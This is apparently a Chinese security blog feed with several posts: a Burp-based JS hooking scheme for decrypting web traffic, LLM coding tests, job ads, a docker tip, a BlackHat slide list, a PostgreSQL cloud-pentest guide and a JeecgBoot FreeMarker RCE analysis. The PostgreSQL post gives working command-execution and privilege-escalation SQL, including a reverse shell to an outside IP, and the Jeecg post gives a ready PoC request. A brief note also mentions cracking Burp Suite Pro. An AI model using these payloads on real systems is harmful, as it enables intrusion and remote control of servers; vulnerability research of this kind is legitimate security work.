漏洞推送

基于JS_HOOK的web流量加解密方案

Mon, 12 Jan 2026 17:14:00 +0800

原创 kkk mr 2026-01-12 17:14 浙江

最近遇到一个web网站，流量是通过js的加密的，于是设计了一套较为通用的流量js hook配置burp的流量加解密方案。

方案分为以下几个部分:

•加密函数的参数和返回值记录•解密函数的的参数和返回值记录•生成请求的Rpc•解密响应的Rpc

优点: 不用管具体的加密算法的实现,找到函数即可

具体实现如下:

记录请求的密文和明文

假设现在网站源码如下:

html>
<htmllang="zh-CN">


<head>
    <metacharset="UTF-8">
    <metaname="viewport"content="width=device-width, initial-scale=1.0">
    <title>demotitle>
    <script>
        function encrypt(data) {
            return btoa(unescape(encodeURIComponent(data))); 
        }
        function decrypt(data) {
            return decodeURIComponent(escape(atob(data)));
        }


        async function send() {
            const inputData = "test";
            if (!inputData) {
                return;
            }
            const encryptedData = encrypt(inputData);
            const payload = {
                message: encryptedData,
                timestamp: new Date().getTime()
            };


            try {
                const response = await fetch('https://httpbin.org/post', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(payload)
                });


                if (response.ok) {
                    const result = await response.json();
                    alert("resonpse:"+ decrypt(JSON.parse(result.data).message));
                } else {
                    alert("error: " + response.status);
                }
            } catch (error) {
            }
        }
    script>
head>


<body>
    <buttontype="button"onclick="send()">sendbutton>
body>


html>

encrypt是加密函数，decrypt是解密函数

通过burp中间人注入hook代码,hook后代码为

html>
<htmllang="zh-CN">


<head>
    <metacharset="UTF-8">
    <metaname="viewport"content="width=device-width, initial-scale=1.0">
    <title>demotitle>
    <script>
        function encrypt(data) {
            return btoa(unescape(encodeURIComponent(data)));
        }
        window.raw_encrypt = encrypt;
        encrypt = function (x) {
            const BASE_URL = 'http://127.0.0.1:9999';
            async function reportData(plain, cipher) {
                await fetch(`${BASE_URL}/report`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ plaintext: plain, ciphertext: cipher })
                });
            };
            plaintext = x;
            ciphertext = window.raw_encrypt(x);
            reportData(plaintext, ciphertext);
            return ciphertext
        };



        function decrypt(data) {
            return decodeURIComponent(escape(atob(data)));
        }
        window.raw_decrypt = decrypt;
        decrypt = function (x) {
            const BASE_URL = 'http://127.0.0.1:9999';
            async function reportData(plain, cipher) {
                await fetch(`${BASE_URL}/report`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ plaintext: plain, ciphertext: cipher })
                });
            };
            ciphertext = x;
            plaintext = window.raw_decrypt(x);
            reportData(plaintext, ciphertext);
            return plaintext
        };



        async function send() {
            const inputData = "test";
            if (!inputData) {
                return;
            }
            const encryptedData = encrypt(inputData);
            const formData = new URLSearchParams();
            formData.append('data', encryptedData);
            try {
                const response = await fetch('https://httpbin.org/post', {
                    method: 'POST',
                    headers: {
                        // 必须指定 Content-Type
                        'Content-Type': 'application/x-www-form-urlencoded'
                    },
                    body: formData // 直接传入 URLSearchParams 对象
                });


                if (response.ok) {
                    const result = await response.json();
                    alert("resonpse:" + decrypt(JSON.parse(result.data).message));
                } else {
                    alert("error: " + response.status);
                }
            } catch (error) {
            }
        }
    script>
head>


<body>
    <buttontype="button"onclick="send()">sendbutton>
body>


html>

这样就将我们将加解密都hook成我们的函数，并且在执行的时候会进行上报

至此，我们可以实现浏览器流量的加解密，效果如下：

原始请求:

解密请求:

原始响应包:

解密响应包:

Rpc实现请求加密

通过右键扩展，将明文数据发送到重放器

效果如下:

我们修改包的参数，然后在浏览器执行如下js代码:

(function () {
    const BRIDGE_URL = "http://127.0.0.1:9999";


    /**
     * Site-specific Encryption Logic
     */
    function Encryption(plainText) {
        return window.raw_encrypt(plainText);
    }


    /**
     * Site-specific Decryption Logic
     * Replace 'window.targetDecrypt' with the actual function found on the site
     */
    function Decryption(cipherText) {
       return window.raw_decrypt(cipherText);
    }


    /**
     * Send result back to Burp Bridge
     */
    async function reportResult(taskId, result) {
        try {
            await fetch(`${BRIDGE_URL}/task`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    id: taskId,
                    result: result
                })
            });
        } catch (e) {
            console.error("Failed to report result:", e);
        }
    }


    async function pollTask() {
        try {
            const resp = await fetch(`${BRIDGE_URL}/task`);
            const task = await resp.json();


            // Ignore IDLE state to reduce console noise
            if (task.type === "IDLE") {
                return;
            }


            console.log("New Task Received:", task.type, task.id);


            let result = null;
            if (task.type === "ENCRYPT") {
                result = await Encryption(task.payload);
            } else if (task.type === "DECRYPT") {
                console.log( "DECRYPT",task.payload)
                result = await Decryption(task.payload);
            }


            if (result !== null) {
                await reportResult(task.id, result);
                console.log("Task Completed:", task.id);
            }


        } catch (e) {
            // console.error("Poll Error:", e.message);
        } finally {
            // Use 200ms-500ms for better responsiveness
            setTimeout(pollTask, 300);
        }
    }


    console.log("JS Bridge Client Started... Waiting for tasks.");
    pollTask();
})();

加密请求

然后选中我们要加密的文本，右键

js收到请求后处理:

加密效果:

解密请求

原始响应:

点击响应的Decrypted tag 触发rpc

插件使用方法

示例代码开源在:

https://github.com/lanyi1998/js_hook_decrype

阅读原文

跳转微信打开

Mac burp高版本UI显示文字缺失问题解决

Fri, 09 Jan 2026 11:19:00 +0800

原创 kkk mr 2026-01-09 11:19 浙江

Mac burp高版本UI显示文字缺失问题解决

最近在使用Burp高版本的时候，遇到需要JDK21。但是在我的mac上安装JDK21的话，很多java软件都会遇到UI显示异常的问题。

如图:

解决办法:

官网下载burp的mac的app包，不是jar包。

然后修改/Applications/Burp Suite Professional.app/Contents/vmoptions.txt这个文件进行破解

阅读原文

跳转微信打开

国产大模型ClaudeCode编程能力测试！

Wed, 24 Dec 2025 14:03:00 +0800

2025-12-24 14:03 浙江

含GML、qwen、DeepSeek、MiniMax-M2测试

测试环境

claude code版本: v2.0.37，为规避历史记录影响,每次执行完以后删除掉.claude目录，重新创建。为保证结果不受其他因素干扰，均只设置最基本的环境变量

提示词: @index.hmtl 将同一家厂商的模型，放到同一行中

测试时间: 2025/12/24

原始index.html文件效果

需要源码自己复现测试的，文件来源是 https://llm.minprices.com/

文本长度17k，在各个模型上下文的舒适区：

考察点:

•能否实现需求•侵入性，如果原本布局被修改视为侵入性过强

DeepSeek

计费模式: API按量付费

进入了先规划后修改的模式

整体用时5分钟左右，修改完成。

页面效果符合需求

花费 0.25元

实现方式: 通过修改原始数据遍历的函数实现

GLM

计费模式: API按量付费 OR 开发者计划

部分情况下，是直接开始改代码

用时1分钟20秒左右，完成了需求，但是原本表格样式被破坏。不符合需求

GLM 2测 : 依然破坏了格式

实现方式和DeepSeek差不多

MiniMax-M2

计费模式: API按量付费 OR 开发者计划

先规划后行动

整体用时: 2分钟左右，满足需求，符合预期。

M2的实现方式是通过，通过js新增函数来进行分组实现

qwen

qwen在未指定模型的情况下，无法通过默认配置使用claude code

消耗token:438895,不及格

结论

在这个测试案例中

MiniMax-M2 解耦和略好于 DeepSeek

GLM、qwen不及格

低频使用推荐使用DeepSeek，每次1-5毛钱

高频使用推荐MiniMax-M2 开发者计划 ¥29 /月 ¥290 /年

阅读原文

跳转微信打开

QuickSearch-chrome右键快速搜索插件

Mon, 24 Nov 2025 11:29:00 +0800

原创 k 2025-11-24 11:29 广东

QuickSearch-chrome右键快速搜索插件

QuickSearch是我开发的一款chrome插件，用于在chrome浏览器中使用右键快速进行资产搜索

1.右键选中文本后，可右键打开对应的测绘引擎的搜索界面，可快速进行title和body搜索

1.快速搜索某个host的下的同ip网站

例如当选中https://cloudflare.com以后点击ip:https://cloudflare.com进行搜索的话会自动将域名转换为ip后再进行搜索，避免需要先ping获取到ip地址然后再进行搜索。

1.快速进行同ip网站搜索

如果不选中任何文本直接右键，点击对应的搜索引擎会直接搜索当tab的对应的同ip的资产

插件地址下载地址:

https://chromewebstore.google.com/detail/quicksearch/emeffeofkinigfdeageidahgnkbcdohi?hl=zh-CN&utm_source=ext_sidebar

阅读原文

跳转微信打开

急聘渗透测试工程师（郑州绿盟）

Thu, 30 Oct 2025 10:35:00 +0800

2025-10-30 10:35 浙江

急聘渗透测试工程师（郑州绿盟）

薪资待遇

10-15k

职位详情

工作职责

1.负责各类渗透测试、代码漏洞挖掘和分析、红蓝对抗、安全培训等工作。2.在发生网络攻击或安全事件时，提供紧急响应服务，协助客户恢复系统并进行调查取证。3.能够独立完成 Web、App 渗透测试和 Web 代码漏洞挖掘与分析。4.熟悉常见的攻击与防御方法，精通 Web 安全和渗透技术。

任职资格

1.统招本科及以上学历，具备安全领域 2 年以上工作经验，计算机、网络、通信等相关专业，能力突出者专业不限；2.熟悉 OWASP TOP10 漏洞原理及实践，以及熟悉 Windows、Linux 等平台使用和攻击技术；熟练掌握 Java、C++、PHP、python 等开发语言；3.熟练应用基本的 WEB 渗透手法如：sql 注入、xss、文件上传、文件包含、命令执行、目录列表等弱点进行渗透测试及恶意代码检测和分析；4.熟悉 WEB 渗透测试的步骤、方法、流程，能够自行进行安全攻防测试，并熟练使用常见的 Web 应用漏洞测试工具，了解其工作原理；5.工作严谨、责任心强，具有良好的团队合作精神和沟通协调能力、较强的领悟、学习能力；6.能够独立编写安全相关工作报告文档等；7.了解国家或者行业的安全规范；8.了解各类安全工具，如漏洞扫描、基线检查等工具。

优先条件

•拥有相关认证证书（如 CISSP、CISA 等）、CVE、CNVD、CNNVD 漏洞提交证明或攻防竞赛获奖者优先。•具备代码审计、攻防项目或 CTF 竞赛经验者优先。

联系人

微信: Truth-_z

阅读原文

跳转微信打开

如何利用vps远程pull镜像

Wed, 10 Sep 2025 19:34:00 +0800

2025-09-10 19:34 广东

因为某些原因，现在docker image是无法直接pull。但是在很多时候，比如在某些国内的测试开发服务器上还是需要pull镜像的。

我希望有一种：

不需要额外安装软件，毕竟安装起来也很浪费时间
不许要承担域名成本以及https成本，虽然现在域名和https证书都很便宜，但是买了以后配置也麻烦。
在远程服务器上也能直接用。

其实利用远程vps + ssh就能够实现了。

一条命令实现,注意如果你的是服务器 linux/arm64需要该改成linux/amd64,我这里是mac用的:

(ssh 'root@vps' "docker pull 'busybox:latest' --platform linux/arm64 &>2 && docker save 'busybox:latest' && docker rmi 'busybox:latest' &>2" | docker load) && echo "✅ 成功！镜像 'busybox:latest' 已导入本地并从远程删除。" || echo "❌ 失败！请检查上面的错误信息。"

通过远程服务器pull以后导入到本地然后自动删除。

如果你的是笔记本，需要长期使用，建议使用shell函数,写入到.zshrc中,然后在终端中使用 pull xxxx:xxx来拉取。

pull() { # 检查是否提供了镜像名参数 if [ -z "$1" ]; then echo "错误: 请提供镜像名称。" >&2 echo "用法: dtrans <镜像名:标签>" >&2 return 1 fi # --- 请修改这里的配置 --- local REMOTE_HOST="root@vps" #! <--- 把这里改成你的远程服务器地址 # ------------------------- local IMAGE_NAME="$1" echo "🚀 准备从 $REMOTE_HOST 传输并清理镜像: $IMAGE_NAME" # 使用 SSH 执行远程命令链，并将 save 的输出通过管道传给本地的 docker load # 远程命令链: 拉取 -> 保存 -> 删除 # &>2 将 pull 和 rmi 的所有输出重定向到 stderr，避免污染数据流 ssh "$REMOTE_HOST" \ "docker pull '$IMAGE_NAME' --platform linux/arm64 &>2 && docker save '$IMAGE_NAME' && docker rmi '$IMAGE_NAME' &>2" \ | docker load # 检查上一个管道命令的最终退出状态 if [ $? -eq 0 ]; then echo "✅ 成功！镜像 '$IMAGE_NAME' 已导入本地并从远程删除。" else echo "❌ 失败！请检查上面的错误信息。" fi}

阅读原文

跳转微信打开

BlackHat_USA_2025 PPT分享

Tue, 19 Aug 2025 11:29:00 +0800

2025-08-19 11:29 浙江

英文原名	中文翻译
Adam Zabrocki&Marko Mitic_How to Secure Unique Ecosystem Shipping 1 Billion+ Cores.pdf	如何保护出货量超十亿核心的独特生态系统
Alex Bourla&Graham Brereton_Turning the Tables on GlobalProtect Use and Abuse of Palo Alto's Remote Access Solution.pdf	扭转乾坤：Palo Alto 远程访问解决方案 GlobalProtect 的使用与滥用
Alex Kantchelian&Maarten van Dantzig&Diana Kramer_Autonomous Timeline Analysis and Threat Hunting An AI Agent for Timesketch.pdf	自主时间线分析与威胁狩猎：一个用于 Timesketch 的人工智能代理
Alex Kantchelian&Ryan Stevens&Yanis Pavlidis&Sadegh Momeni&Casper Neo&Birkett Huber&Elie Bursztein_FACADE High-Precision Insider Threat Detection Using Contrastive Learning.pdf	FACADE：使用对比学习进行高精度内部威胁检测
Ali Ranjbar&Tianchang Yang&Kai Tu&Saaman Khalilollahi&Kanika Gupta&Syed Rafiul Hussain_Uncovering 'NASty' 5G Baseband Vulnerabilities through Dependency-Aware Fuzzing.pdf	通过依赖感知模糊测试揭露“NASty”5G 基带漏洞
Alon Leviev&Netanel Ben Simon&Yair Netzer&Amit Dori_BitUnlocker Leveraging Windows Recovery to Extract BitLocker Secrets.pdf	BitUnlocker：利用 Windows 恢复功能提取 BitLocker 密钥
Altaf Shaik&Robert Jaschek_The 5G Titanic.pdf	5G 泰坦尼克号
Andrew Brandt_Firewalls Under Fire China's 5+ Year Campaign to Penetrate Perimeter Network Defenses.pdf	防火墙告急：中国持续五年以上渗透外围网络防御的行动
Bela Genge&Ioan Padurean&Dan Macovei_Exploiting DNS for Stealthy User Tracking_WP.pdf	利用 DNS 进行隐蔽用户追踪（白皮书）
Bela Genge&Ioan Padurean&Dan Macovei_Exploiting DNS for Stealthy User Tracking.pdf	利用 DNS 进行隐蔽用户追踪
Ben Gelman&Sean Bergeron_Anomaly Detection Betrayed Us, so We Gave It a New Job Enhancing Command Line Classification with Benign Anomalous Data.pdf	异常检测的背叛与新生：利用良性异常数据增强命令行分类
Brendan Dolan-Gavitt_AI Agents for Offsec with Zero False Positives.pdf	用于进攻性安全且零误报的人工智能代理
Colin Estep&Dagmawi Mulugeta_Your Traffic Doesn't Lie Unmasking Supply Chain Attacks via Application Behaviour.pdf	流量不会说谎：通过应用行为揭示供应链攻击
David Brauchler III_When Guardrails Aren't Enough Reinventing Agentic AI Security With Architectural Controls.pdf	当护栏不足时：用架构控制重塑代理式人工智能安全
Deral Heiland&Carlota Bindner_Weaponization of Cellular Based IoT Technology – Leveraging Smart Devices to Gain a Foothold.pdf	蜂窝物联网技术的武器化——利用智能设备建立据点
Fengyu Liu&YouKun Shi&Tian Chen&Bocheng Xiang&Junyao He&Qi Li&Guangliang Yang&Yuan Zhang&Min Yang_Detecting Taint-Style Vulnerabilities in Microservice-Structured Web Applications.pdf	检测微服务架构 Web 应用中的污点类型漏洞
Garrett Foster_Clustered Points of Failure - Attacking Windows Server Failover Clusters_TOOLS.txt	集群故障点 - 攻击 Windows Server 故障转移集群（工具）
Garrett Foster_Clustered Points of Failure - Attacking Windows Server Failover Clusters.pdf	集群故障点 - 攻击 Windows Server 故障转移集群
Ibrahim El-sayed_Decoding Signal Understanding the Real Privacy Guarantees of E2EE.pdf	解码 Signal：理解端到端加密的真实隐私保障
Ji'an Zhou&Li'shuo Song_Safe Harbor or Hostile Waters Unveiling the Hidden Perils of the TorchScript Engine in PyTorch.pdf	安全港还是险恶水域？揭示 PyTorch 中 TorchScript 引擎的隐藏危险
Kaixuan Luo&Xianbo Wang&Adonis Fung&Yanxiang Bi&Wing Cheong Lau_Back to the Future Hacking and Securing Connection-based OAuth Architectures in Agentic AI and Integration Platforms.pdf	回到未来：在代理式人工智能和集成平台中攻击并保护基于连接的 OAuth 架构
Koh Nakagawa_XUnprotect Reverse Engineering macOS XProtect Remediator_TOOLS.txt	XUnprotect：逆向工程 macOS XProtect Remediator（工具）
Koh Nakagawa_XUnprotect Reverse Engineering macOS XProtect Remediator.pdf	XUnprotect：逆向工程 macOS XProtect Remediator
Kyle Avery_Training Specialist Models Automating Malware Development.pdf	训练专用模型：自动化恶意软件开发
Marco Casagrande&Daniele Antonioli_E-Trojans Ransomware, Tracking, DoS, and Data Leaks on Xiaomi Electric Scooters_WP.pdf	电动木马：小米电动滑板车上的勒索软件、追踪、DoS 攻击和数据泄露（白皮书）
Marco Casagrande&Daniele Antonioli_E-Trojans Ransomware, Tracking, DoS, and Data Leaks on Xiaomi Electric Scooters.pdf	电动木马：小米电动滑板车上的勒索软件、追踪、DoS 攻击和数据泄露
Marcos Bajo&Christian Rossow_Coroutine Frame-Oriented Programming Breaking Control Flow Integrity by Abusing Modern C++.pdf	协程帧导向编程：滥用现代 C++ 破坏控制流完整性
Marius Muench&Sam Collins&Tom Chothia_Watching the Watchers Exploring and Testing Defenses of Anti-Cheat Systems.pdf	监视监视者：探索和测试反作弊系统的防御机制
Neophytos Christou&Andreas Kellas_QUACK Hindering Deserialization Attacks via Static Duck Typing.pdf	QUACK：通过静态鸭子类型阻止反序列化攻击
Pinji Chen&Jianjun Chen&Qi Wang&Mingming Zhang&Haixin Duan_Cross-Origin Web Attacks via HTTP2 Server Push and Signed HTTP Exchange_WP.pdf	通过 HTTP/2 服务器推送和签名 HTTP 交换实现的跨源 Web 攻击（白皮书）
Pinji Chen&Jianjun Chen&Qi Wang&Mingming Zhang&Haixin Duan_Cross-Origin Web Attacks via HTTP2 Server Push and Signed HTTP Exchange.pdf	通过 HTTP/2 服务器推送和签名 HTTP 交换实现的跨源 Web 攻击
Qibo Shi&Victor V&Wei Xiao&Zhiniang Peng_Diving into Windows HTTP Unveiling Hidden Preauth Vulnerabilities in Windows HTTP Services.pdf	深入 Windows HTTP：揭示 Windows HTTP 服务中隐藏的预认证漏洞
Rama Hoetzlein_Protecting Small Organizations in the Era of AI Bots.pdf	在人工智能机器人时代保护小型组织
Rebecca Lynch&Rich Harang_From Prompts to Pwns Exploiting and Securing AI Agents.pdf	从提示到攻陷：利用与保护人工智能代理
Ryan Barnett&Isabella Barnett_Lost in Translation Exploiting Unicode Normalization.pdf	迷失于翻译：利用 Unicode 规范化漏洞
Salvatore Gariuolo_Smart Charging, Smarter Hackers The Unseen Risks of ISO 15118.pdf	智能充电，更高明的黑客：ISO 15118 的潜在风险
Sandro Rüegge&Johannes Wikner_Racing for Privilege Leaking Privileged Memory From Any Intel System Using a Microarchitectural Race Condition_TOOLS.txt	争夺权限：利用微架构竞态条件从任何英特尔系统泄露特权内存（工具）
Sandro Rüegge&Johannes Wikner_Racing for Privilege Leaking Privileged Memory From Any Intel System Using a Microarchitectural Race Condition_WP.pdf	争夺权限：利用微架构竞态条件从任何英特尔系统泄露特权内存（白皮书）
Sandro Rüegge&Johannes Wikner_Racing for Privilege Leaking Privileged Memory From Any Intel System Using a Microarchitectural Race Condition.pdf	争夺权限：利用微架构竞态条件从任何英特尔系统泄露特权内存
Tianchang Yang&Kai Tu&Syed Md Mukit Rashid&Ali Ranjbar&Gang Tan&Syed Rafiul Hussain_Open RAN, Open Risk Uncovering Threats and Exposing Vulnerabilities in Next-Gen Cellular RAN.pdf	开放 RAN，开放风险：揭示下一代蜂窝无线接入网中的威胁与漏洞
Tod Beardsley_Vulnerability Haruspicy Picking Out Risk Signals from Scoring System Entrails_WP.pdf	漏洞预言：从评分系统细节中识别风险信号（白皮书）
Tod Beardsley_Vulnerability Haruspicy Picking Out Risk Signals from Scoring System Entrails.pdf	漏洞预言：从评分系统细节中识别风险信号
Tom Tervoort_No VPN Needed Cryptographic Attacks Against the OPC UA Protocol_TOOLS.txt	无需 VPN：针对 OPC UA 协议的密码学攻击（工具）
Tom Tervoort_No VPN Needed Cryptographic Attacks Against the OPC UA Protocol_WP.pdf	无需 VPN：针对 OPC UA 协议的密码学攻击（白皮书）
Tom Tervoort_No VPN Needed Cryptographic Attacks Against the OPC UA Protocol.pdf	无需 VPN：针对 OPC UA 协议的密码学攻击
Vaisha Bernard_Consent & Compromise Abusing Entra OAuth for Fun and Access to Internal Microsoft Applications.pdf	同意与妥协：滥用 Entra OAuth 获取内部微软应用的访问权限
Vedang Parasnis_Kernel-Enforced DNS Exfiltration Security Framework Built for Cloud Environments to Stop Data Breaches via DNS at Scale_WP.pdf	内核强制的 DNS 数据外泄安全框架：为云环境构建以大规模阻止 DNS 数据泄露（白皮书）
Vedang Parasnis_Kernel-Enforced DNS Exfiltration Security Framework Built for Cloud Environments to Stop Data Breaches via DNS at Scale.pdf	内核强制的 DNS 数据外泄安全框架：为云环境构建以大规模阻止 DNS 数据泄露
Xiaochen Wang&Yiping Liu&Xiaoman Wang&Cong Cheng_LLMDYara LLMs-Driven Automated YARA Rules Generation with Explainable File Features and DNAHash.pdf	LLMDYara：由大语言模型驱动，结合可解释文件特征和 DNAHash 的自动化 YARA 规则生成
Yuan Luo&Zhaojun Chen&Yi Sun&Rhettxie Rhettxie_More Flows, More Bugs Empowering SAST with LLMs and Customized DFA.pdf	更多流，更多漏洞：用大语言模型和定制化数据流分析赋能静态应用安全测试

下载地址:

https://github.com/onhexgroup/Conferences/tree/main/BlackHat_USA_2025_Slides

阅读原文

跳转微信打开

云环境下的PostgreSQL渗透

Sat, 26 Jul 2025 09:09:00 +0800

2025-07-26 09:09 北京

云环境下的PostgreSQL渗透

前段时间因为有个项目涉及到云环境下的渗透，于是学习了Wiz Research关于pg渗透的文章

目前在云环境下给用户的pg账号，都是经过降权的账号，非真正的超管用户，是无法执行命令的。

信息搜集

命令执行

如果有SUPERUSER权限，可以直接执行命令

CREATE TABLE shell_results (data text);
COPY shell_results FROM PROGRAM'/usr/bin/id';
SELECT * from shell_results;

如果不清楚自己的权限，可以通过下面的命令来查询自己的权限

查询用户所拥有的权限

SELECT rolname,
       trim(',' from
           CASE WHEN rolsuper THEN 'SUPERUSER,' ELSE '' END ||
           CASE WHEN rolinherit THEN 'INHERIT,' ELSE '' END ||
           CASE WHEN rolcreaterole THEN 'CREATEROLE,' ELSE '' END ||
           CASE WHEN rolcreatedb THEN 'CREATEDB,' ELSE '' END ||
           CASE WHEN rolcanlogin THEN 'LOGIN,' ELSE '' END ||
           CASE WHEN rolreplication THEN 'REPLICATION,' ELSE '' END ||
           CASE WHEN rolbypassrls THEN 'BYPASSRLS,' ELSE '' END
       ) as permissions
FROM pg_roles;

查询数据库owner

SELECT datname, pg_catalog.pg_get_userbyid(datdba) AS owner FROM pg_catalog.pg_database;

查询表owner

SELECT
    n.nspname AS schema_name,
    c.relname AS table_name,
    pg_catalog.pg_get_userbyid(c.relowner) AS owner_name
FROM
    pg_catalog.pg_class c
JOIN
    pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE
    c.relkind = 'r' -- 'r' 表示普通表 (regular table)
    AND n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') -- 排除系统模式
ORDER BY
    schema_name, table_name;

查询当前用户的权限

WITH RECURSIVE effective_roles AS (
    -- 当前用户直接所属的角色
    SELECT
        m.roleid AS parent_role_oid,
        m.member AS member_role_oid
    FROM
        pg_auth_members m
    WHERE
        m.member = (SELECT oid FROM pg_roles WHERE rolname = current_user)


    UNION ALL


    -- 递归地查找这些角色所属的其他角色
    SELECT
        m.roleid,
        m.member
    FROM
        pg_auth_members m
    INNER JOIN
        effective_roles er ON m.member = er.parent_role_oid
)
SELECT DISTINCT
    r.rolname
FROM
    pg_roles r
WHERE
    r.oid IN (SELECT parent_role_oid FROM effective_roles)
ORDER BY
    r.rolname;

ALTER owner 实现命令执行

如果能将表的owner修改为超管用户rdsAdmin，可以配合ALTER加索引函数实现命令执行

CREATE TABLE test_table(data text);
ALTER TABLE test_table owner to "rdsAdmin";


INSERT INTO test_table VALUES ('dummy content');
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';
CREATE INDEX index_malicious ON public.test_table (suid_function(data));
ALTER TABLE test_table OWNER TO cloudsqladmin;
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';

CREATEROLE 实现命令执行

如果用户有用CREATEROLE权限，可直接实现命令执行

CREATE USER james CREATEDB IN GROUP
  pg_read_server_files,
  pg_write_server_files,
  pg_execute_server_program ROLE postgres;


 SET ROLE "james";
COPY shell_results FROM program '/bin/bash -c "bash -i >& /dev/tcp/13.33.33.7/1337 0>&1"';

连接Mysql读取文件

如果pg安装了mysql扩展，可能存在文件读取漏洞

CREATE SERVER mysql_server FOREIGN DATA WRAPPER mysql_fdw OPTIONS(host'172.31.13.58',port'3306');


CREATE USER MAPPING FOR CURRENT_USER SERVER mysql_server OPTIONS (username 'linux_hosts', password 'root');


CREATE FOREIGN TABLE test(id int) SERVER mysql_server OPTIONS (dbname 'a', table_name 'test');


select * from test;
DROP USER MAPPING FOR root SERVER mysql_server;
DROP SERVER mysql_server CASCADE;

参考链接

云存在隔离问题：PostgreSQL 漏洞影响多个云供应商
https://wiki.teamssix.com/cloudservice/rds/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities.html

阅读原文

跳转微信打开

招聘-安全服务工程师（郑州）

Sat, 26 Jul 2025 09:09:00 +0800

2025-07-26 09:09 北京

招聘-安全服务工程师（郑州）

安全服务工程师（郑州）

薪资待遇

10-15k

职位详情

工作职责

1.负责各类渗透测试、代码漏洞挖掘和分析、红蓝对抗、安全培训等工作。2.在发生网络攻击或安全事件时，提供紧急响应服务，协助客户恢复系统并进行调查取证。3.能够独立完成Web、App渗透测试和Web代码漏洞挖掘与分析。4.熟悉常见的攻击与防御方法，精通Web安全和渗透技术。

任职资格

1.学历要求：本科及以上学历，计算机或相关专业优先。2.专业知识：

•熟悉网络与信息安全基础知识。•熟悉主流操作系统、中间件、数据库等。•了解行业最新动向、等级保护等相关标准与规范。•熟悉 OWASP TOP 10 安全风险以及 Web 领域的常用标准、协议和漏洞原理。

3.技术能力：

•熟练掌握常见的 Web 漏洞入侵与防范方法。•能够熟练使用主流渗透测试工具，如 Nessus、Nmap、Acunetix、Burp Suite、Sqlmap、Wireshark、AWVS、Metasploit 等。•熟练掌握至少一门编程语言。

4.综合素质：

•具备良好的语言表达能力和文档组织能力。•具备良好的团队合作精神。

5.优先条件：

•拥有相关认证证书（如 CISSP、CISA 等）、CVE、CNVD、CNNVD 漏洞提交证明或攻防竞赛获奖者优先。•具备代码审计、攻防项目或 CTF 竞赛经验者优先。

联系人

微信: sanzhang0725

阅读原文

跳转微信打开

jeecg boot queryFieldBySql RCE漏洞分析

Sat, 08 Feb 2025 16:59:00 +0800

原创 kkk 2025-02-08 16:59 浙江

环境搭建

后端

源码地址:

https://github.com/jeecgboot/JeecgBoot

找到v3.5.3的commit，创建一个分支

安装Maven依赖

数据库配置文件: jeecg-module-system/jeecg-system-start/src/main/resources/application-dev.yml

启动mysql: docker run -itd --name jeecg_mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=root mysql:5.7

解决Table 'test.QRTZ_TRIGGERS' doesn't exist问题

docker cp jeecg_mysql:/etc/my.cnf my.cnf

[mysqld]下面加入

lower_case_table_names=1

docker cp my.cnf jeecg_mysql:/etc/my.cnf

重启mysql

导入数据库: jeecg-boot/db/jeecgboot-mysql-5.7.sql

启动redis: docker run -itd -p 6379:6379 --name jeecg_redis redis

启动项目: jeecg-system-start/src/main/java/org/jeecg/JeecgSystemApplication.java

漏洞复现

poc:

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1Host: 192.168.1.108:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Config/100.2.9281.82Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: zh-CN,zhAccept-Encoding: gzip, deflateConnection: closeContent-Type: application/jsonContent-Length: 124
{    "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"touch /tmp/success\")}",    "type": "0"}

漏洞分析

jeecg使用shiro做鉴权框架，配置文件在 src/main/java/org/jeecg/config/shiro/ShiroConfig.java

设置了jmreport api排除

//积木报表排除filterChainDefinitionMap.put("/jmreport/**", "anon");filterChainDefinitionMap.put("/**/*.js.map", "anon");filterChainDefinitionMap.put("/**/*.css.map", "anon");

反编译jar包，定位到漏洞路由

/org/jeecgframework/jimureport/jimureport-spring-boot-starter/1.5.9/jimureport-spring-boot-starter-1.5.9.jar!/org/jeecg/modules/jmreport/desreport/a/a.class:596#parseReportSql

request进入到c函数后，有一个简单的sql过滤的处理

然后传递给org.jeecg.modules.jmreport.desreport.service.a.i的parseReportSql方法

 @PostMapping({"/queryFieldBySql"})    public Result c(@RequestBody JSONObject var1) {        ...        Map var12 = this.reportDbService.parseReportSql(var2, var3, var4, var5);        ...    }

parseReportSql函数中,主要关注 sql = f.a(sql, var8, (JSONArray)null);

public Map parseReportSql(String sql, String dbKey, Object paramArray, String type) throws JimuReportException {        HashMap var5 = new HashMap(5);        new ArrayList();        String var7 = this.jimuTokenClient.getToken();        Map var8 = null;        if (g.d(var7)) {            var8 = this.jimuTokenClient.getUserInfo(var7);        }
        if (g.d(paramArray)) {            sql = f.a(sql, var8, JSONArray.parseArray(paramArray.toString()));        } else {            sql = f.a(sql, var8, (JSONArray)null);        }        ...}

a函数传递给了另一个a函数

public static String a(String var0, Map var1, JSONArray var2) {    ...    var0 = a(var2, var0);    ...}

a函数传递给了FreeMarkerUtils的a函数

public static String a(JSONArray var0, String var1) {    ...    var1 = FreeMarkerUtils.a(var1, var2);    ...}

FreeMarkerUtils的a函数如下，将sql语句带入模板进行执行，完成rce:

